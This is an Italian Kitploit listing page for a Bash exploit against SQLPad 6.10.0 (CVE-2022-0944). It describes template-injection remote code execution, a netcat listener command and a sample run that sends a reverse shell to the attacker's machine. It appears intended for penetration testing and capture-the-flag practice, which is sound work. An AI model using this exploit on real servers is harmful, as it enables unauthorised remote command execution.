Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SQLPad-6.10.0-Exploit-CVE-2022-0944 — Refurbish | Kitploit
Strumenti/GitHubGitHub/0xdtc/sqlpad-6.10.0-exploit-cve-2022-0944
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHub0xdtc/sqlpad-6.10.0-exploit-cve-2022-0944

SQLPad-6.10.0-Exploit-CVE-2022-0944

Refurbish

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

SQLPad 6.10.0 Exploit (CVE-2022-0944)

Questo script Bash sfrutta una vulnerabilità RCE in SQLPad 6.10.0, consentendo a un attaccante di eseguire codice in remoto (RCE) abusando dei campi host e database nelle impostazioni di connessione MySQL di SQLPad. L'exploit sfrutta la gestione non sanificata del modulo child_process in Node.js per eseguire comandi arbitrari, aprendo infine una reverse shell sulla macchina dell'attaccante.

Prerequisiti

  1. Listener Netcat: Assicurati di avere un listener attivo sulla tua macchina con nc -lvnp 9001.
  2. Accesso al Server Target: Questo exploit presuppone che tu possa comunicare con l'istanza vulnerabile di SQLPad.

Utilizzo

  1. Clona il Repository (o copia lo script localmente).
  2. Esegui lo Script:
root@kitploit:~
┌──(kali㉿kali)-[~/HTB/machines/sightless]
└─$ ./CVE-2022-0944
Please make sure to start a listener on your attacking machine using the command:
nc -lvnp 9001
Waiting for you to set up the listener...
Press [Enter] when you are ready...
Please provide the target host (e.g., x.x.com): 
x.example.com
Please provide your IP address (e.g., 10.10.16.3): 
0.0.0.0
Exploit sent. If everything went well, check your listener for a connection on port 9001.
  1. Segui le istruzioni dello script per inserire l'host target e il tuo indirizzo IP, quindi attendi una connessione reverse shell.

Dettagli

  • CVE: CVE-2022-0944
  • Versione interessata: SQLPad 6.10.0
  • Vulnerabilità: Esecuzione di codice in remoto (RCE) tramite template injection
  • Impatto: Questo exploit consente a un attaccante di eseguire comandi sul server target con i privilegi del processo SQLPad.

Dichiarazione di non responsabilità

Questo codice è solo a scopo educativo. L'accesso non autorizzato a sistemi informatici è illegale. Utilizza questo exploit solo con autorizzazione.

Scarica lo strumento